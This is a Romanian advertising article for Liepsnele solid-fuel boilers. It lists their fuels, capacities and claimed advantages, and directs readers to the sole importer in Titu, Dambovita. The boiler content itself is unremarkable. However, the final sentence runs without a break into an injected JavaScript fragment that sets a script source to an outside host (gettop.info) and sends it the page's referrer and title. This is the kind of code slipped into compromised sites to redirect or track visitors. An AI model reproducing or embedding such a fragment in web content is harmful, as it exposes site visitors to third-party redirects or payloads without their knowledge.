Iarna se apropie si fiecare dintre noi ne gandim la un mod eficient si in acelasi timp economic de a ne asigura caldura in lunile care urmeaza. Unii prefera incalzirea provenita de la oras, altii au montate centrale termice, altii prefera sa foloseasca sobe, fiecare in functie de posibilitati si preferinte. Daca inca nu stiti ce solutie sa adoptati pentru a va bucura de confort si costuri reduse la incalzire, puteti lua in considerare ideea de a va monta centrale Liepsnele.

Doriti sa stiti mai multe despre centrale Liepsnele?

Aceste centrale Liepsnele, sunt produse in Lituania si functioneaza pe baza de combustibil solid, cum ar fi: lemn, deseuri de lemn, carbine, brichete si se preteaza excelent pentru cladiri, incaperi in care este instalat un sistem de incalzire cu calorifere, incalzire prin pardoseala etc. Astfel de centrale Liepsnele au fost testate si omologate de catre Autoritatea Germana TUV, putand sa reziste foarte bine unor socuri termice. Este important sa stiti ca diversele modele de centrale Liepsnele au capacitate cuprinse intre 10 kW si 40 kW.

Ce avantaje aveti daca optati pentru centrale Liepsnele?

Optand pentru centrale Liepsnele va puteti bucura de numersoase avantaje. Iata cateva dintre ele:

–        eficienta de pana la 90% indiferent de regimul in care functioneaza

–        ardere neintrerupta- o incarcare cu carbuni asigura o functionare continua timp de 5 zile

–        pot asigura incalzire pe o suprafata de pana la 400 mp

–        constructie simplificata

–        siguranta folosirii

–        nu colecteaza rasina

–        nu produce condens

–        curatarea de cenusa trebuie facuta de maxim doua ori pe luna

–        exploatare de lunga durata de 20-25 de ani

–        se ofera 5 ani garantie

–        certificat TUV

–        calitate garantata

–        preturi convenabile, pentru toate bugetele

–        economie- combustibilii solizi sunt mai ieftini decat celelalte tipuri (gpl, gaz etc)

De unde puteti sa cumparati centrale Liepsnele?

Unicul importator de centrale Liepsnele, cu sediul in judetul Dambovita va propune mai multe modele de centrale Liepsnele. Fiecare dintre acestea pot fi vizualizate accesand site-ul centrale-lemne-liepsnele.ro. Puteti opta pentru centrale Liepsnele care pot incalzi o suprafata de 50-100 mp, 80-200 mp sau chiar 180-400 mp, in functie de suprafata casei dumneavoastra. Preturile la care pot fi cumparate aceste centrale Liepsnele sunt foarte avantajoase. In ceea ce priveste montarea loc, se recomanda apelarea la niste specialisti, persoane abilitate sa faca acest lucru, pentru ca totul sa fie in regula, iar functionarea sa nu aiba de suferit. Indiferent de modelul pentru care veti opta, trebuie sa stiti ca aceasta firma va ofera transportul gratuit.

Cum puteti sa ii contactati pe reprezentantii unicului importator de centrale Liepsnele din tara noastra?

Acestia pot fi gasiti cu usurinta pe Facebook , cautand Centrale Lemne si Carbuni Liepsnele sau pot fi contactati prin e-mail sau telefon. Firma are sediul in localitatea Titu din judetul Dambovita. Informatii detaliate despre toate modelele de centrale Liepsnele  puteti obtine si daca accesati site-ul centrale-lemne-liepsnele.ro Alegeti sa colaborati cu aceasta firma, pentru a beneficia de confort, eficienta si pentru a economisi sume importante in fiecare an.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;